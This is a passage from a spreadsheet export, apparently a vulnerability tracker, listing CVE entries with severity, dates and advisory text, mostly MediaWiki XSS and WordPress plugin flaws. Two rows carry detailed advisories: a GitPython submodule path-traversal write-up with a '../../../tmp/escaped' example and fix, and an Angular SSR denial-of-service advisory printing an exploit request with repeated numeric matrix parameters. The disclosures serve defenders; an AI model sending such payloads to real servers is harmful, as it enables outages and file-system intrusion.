      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103440</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103445</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Page_Forms extension allows Stored XSS.
This issue affects MediaWiki Page_Forms extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103445</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103585</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki MediaSearch extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki MediaSearch extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103585</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103437</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki ReadingLists extension allows Reflected XSS.
This issue affects MediaWiki ReadingLists extension: 1.46 and 1.45.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103437</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103443</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Collection (Book) extension allows XSS Targeting Non-Script Elements.
This issue affects MediaWiki Collection (Book) extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103443</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103444</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki WikiForum extension allows Stored XSS.
This issue affects MediaWiki WikiForum extension: master.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103444</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103584</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki CommonsMetadata extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki CommonsMetadata extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103584</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103438</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>0.3</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Wikistories extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki Wikistories extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103438</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103439</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>0.3</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Wikbase extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki Wikbase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103439</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100689</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M591" s="5" t="inlineStr">
        <is>
          <t>3.1.62</t>
        </is>
      </c>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>**Affected:** `GitPython` **3.1.61** (latest release) and `main` — `git/objects/submodule/base.py`. `git diff 3.1.61 origin/main -- git/objects/submodule/` is empty, so both are identical here.
---
## The gap
The fix for `GHSA-hmq2-w58f-27jc` added `Submodule._validated_name()` and wired it into `update()` and five siblings, closing the `.gitmodules` **name** → `.git/modules/&lt;name&gt;` traversal. The other attacker-controlled `.gitmodules` field, **`path`**, is read raw:
```python
# git/objects/submodule/base.py:172-177
def _set_cache_(self, attr):
    if attr in ("path", "_url", "_branch_path"):
        reader = self.config_reader()
        self.path = reader.get("path")          # raw .gitmodules value
```
and GitPython's own containment guard is applied in only two of the places that consume it:
```
400: def _to_relative_path(cls, parent_repo, path)      # the guard (abspath + commonpath containment)
542:     path = cls._to_relative_path(repo, path)        # add()   — guarded
1041:    module_checkout_path = self._to_relative_path(self.repo, module_path)   # move() — guarded
```
`update()` validates only the name and then uses the path-derived absolute location directly:
```
788:  self._validated_name(self.name)                    # NAME only
801:  checkout_module_abspath = self.abspath             # derived from self.path — unguarded
821:  os.makedirs(checkout_module_abspath, exist_ok=True)
```
So `path = ../../../tmp/escaped` in an attacker-authored `.gitmodules` selects the directory that gets created and, on the clone path, populated from the submodule URL. The same absolute location is what `force_remove` hands to `shutil.rmtree`.
The asymmetry is the argument: this is not a missing concept — the project wrote `_to_relative_path()` precisely for this, and `add()`/`move()` use it. `update()` does not.
## Honest limits (please read before rating)
- **The most common flow is not affected.** `Repo.clone_from(...)` → `repo.submodules` → `sm.update(init=True)` re-derives `path` from a canonical tree lookup, and real git refuses to check out a tree containing a `..` component, so an evil `.gitmodules` never lands in the working tree in the first place. A reachable trigger therefore requires the victim's code to name a **non-HEAD commit** (a historical-commit API such as `submodule_update(previous_commit=...)`).
- **The researcher did not build that end-to-end trigger.** The researcher only verified first-hand the code above: the guard's two call sites, the name-only validation in `update()`, and the unguarded `abspath` → `os.makedirs()` flow at 3.1.61 == `main`.
## Suggested fix
Apply the guard the project already has, wherever the path is consumed:
```python
# in update(), before deriving abspath (and in any other consumer of self.path):
checkout_rel = self._to_relative_path(self.repo, self.path)   # raises if it escapes the working tree
```
Better still, validate at the boundary: reject a `.gitmodules` entry whose `path` is absolute or contains a `..` component when the section is first read in `_set_cache_()`/`iter_items()`, so no consumer can be added later without the check. A regression test with `path = ../escaped` alongside the existing `name` test would pin both fields.
## Prior art checked
`GHSA-hmq2-w58f-27jc` (this is a residual of its fix, in the sibling field, not a re-report) plus the repository's 30 published advisories — none mentions the `path` field or `_to_relative_path`. Searched issues and PRs for `_to_relative_path`, `gitmodules path` and `submodule traversal`: no report of this.
## Credit
**kta1kri**.
---
## Appendix — `EVIDENCE_gitpython_path_unguarded_20260901.txt` (inlined; advisories accept no attachments)
```text
=== EVIDENCE: GitPython — the .gitmodules 'path' field reaches os.makedirs()/clone unguarded ===
Mon Aug 31 18:45:22 UTC 2026
--- artifact: tag 3.1.61 (latest release); git diff 3.1.61 origin/main -- git/objects/submodule/ is empty ---
--- the containment guard GitPython owns, and its only two call sites ---
33:    _to_relative_path,
400:    def _to_relative_path(cls, parent_repo: "Repo", path: PathLike) -&gt; PathLike:
407:            path = _to_relative_path(parent_repo.working_tree_dir, path)
542:        path = cls._to_relative_path(repo, path)
1041:        module_checkout_path = self._to_relative_path(self.repo, module_path)
--- the parent fix (_validated_name) call sites: it validates the NAME ---
309:    def _validated_name(cls, name: str) -&gt; str:
321:        name = cls._validated_name(name)
541:        cls._validated_name(name)
788:            self._validated_name(self.name)
1040:        self._validated_name(self.name)
1181:        self._validated_name(self.name)
1439:        self._validated_name(self.name)
1440:        self._validated_name(new_name)
1489:        self._validated_name(self.name)
--- update(): name validated, path not; abspath -&gt; os.makedirs ---
        try:
            self._validated_name(self.name)
            # ENSURE REPO IS PRESENT AND UP-TO-DATE
                # END early abort if init is not allowed
                checkout_module_abspath = self.abspath
                module_abspath = self._module_abspath(self.repo, self.path, self.name)
                # ``git submodule deinit`` leaves the repository in
                # ``.git/modules`` and empties the checkout. Reconnect that retained
                # repository instead of trying to clone over it.
                if not dry_run and osp.isdir(module_abspath):
                    try:
                        git.Repo(module_abspath)
                    except InvalidGitRepositoryError:
                        pass
                    else:
                        if osp.lexists(checkout_module_abspath) and (
                            osp.islink(checkout_module_abspath)
                            or not osp.isdir(checkout_module_abspath)
                            or os.listdir(checkout_module_abspath)
                        ):
                            raise OSError(
                                "Module directory at %r does already exist and is non-empty" % checkout_module_abspath
                            )
                        os.makedirs(checkout_module_abspath, exist_ok=True)
                        self._write_git_file_and_module_config(checkout_module_abspath, module_abspath)
                        mrepo = git.Repo(checkout_module_abspath)
--- where self.path comes from (raw .gitmodules value) ---
    def _set_cache_(self, attr: str) -&gt; None:
        if attr in ("path", "_url", "_branch_path"):
            reader: SectionConstraint = self.config_reader()
            # Default submodule values.
            try:
                self.path = reader.get("path")
            except cp.NoSectionError as e:
```</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100689</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101147</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>The Featured Image from URL (FIFU) WordPress plugin before 6.0.8, Featured Image from URL (FIFU) Premium WordPress plugin before 8.2.8 do not correctly enforce the REST API nonce, disabling the check for the whole request when a crafted URL is used, which could allow attackers to make a logged-in administrator perform any REST API action, such as creating a new administrator account, via a CSRF attack.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101147</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101148</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 does not properly validate its integration key, treating an unset or blank key as valid, which allows unauthenticated attackers to create and download full site backups, including the database with user password hashes, and to delete arbitrary files on the server, leading to sensitive data disclosure and site takeover.
The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 has been closed on WordPress.org since July 2024 and no fixed version is available. Remove it from any site where it is installed.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101148</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101896</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/router</t>
        </is>
      </c>
      <c r="M594" s="5" t="inlineStr">
        <is>
          <t>20.3.32, 21.2.24, 22.2.0</t>
        </is>
      </c>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8).
When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (`Record&lt;string, string&gt;`). When matrix parameter names or outlet names are numeric strings (such as `/a;990;2522`), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8's internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (`HOLEY_ELEMENTS`) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by `2522`) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment.
Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately **~350x**.
### Impact
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service.
* **High Amplification:** A single 11-byte segment (`/a;990;2522`) consumes ~20 KB–25 KB of V8 heap.
* **Low Concurrency Required:**
  * With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as **12–22 concurrent requests** crash a 256 MiB–512 MiB Node.js SSR worker.
  * With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion.
* **Client-side SPAs Unaffected:** Pure client-side Angular applications (Single Page Applications without SSR) are **not** vulnerable, as local browser memory consumption does not cross a security boundary.
### Attack Preconditions &amp; Vulnerable Configurations
An application is affected only if **all** of the following conditions are met:
* **SSR Enabled:** The application runs in a Server-Side Rendering environment powered by Node.js / V8.
* **Direct Router Parsing:** User-controlled request URLs are parsed by `@angular/router` during SSR.
* **No Reverse-Proxy Semicolon/Segment Filtering:** Upstream reverse proxies (Nginx, Cloudflare, ALB) forward URLs containing semicolons (`;`) and multiple path segments without stripping or rejecting them.
#### Exploit Payload Example
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
```http
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1
Host: example.com
```
Even with paths under 2 KB, overlapping requests during SSR will rapidly consume the V8 heap until the process crashes.
### Patches
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (`setUrlDerivedKey`) for numeric URL-derived keys (index &gt;= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
* `22.2.0`
* `21.2.24`
* `20.3.32`
### Workarounds &amp; Mitigations
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
1. **Block or Sanitize Matrix Parameters at the Reverse Proxy:**  
   Configure your reverse proxy (e.g., Nginx, Cloudflare, or AWS WAF) to reject or strip semicolons (`;`) in request paths before forwarding requests to the Angular SSR service:
   ```nginx
   # Nginx example: reject requests containing matrix parameters
   if ($uri ~* ";") {
       return 400;
   }
   ```
2. **Enforce Strict Path Segment Limits:**  
   Reject requests with excessive path depth (e.g., more than 20–30 segments).
3. **Increase Node.js Old Space:**  
   Increase `--max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.</t>
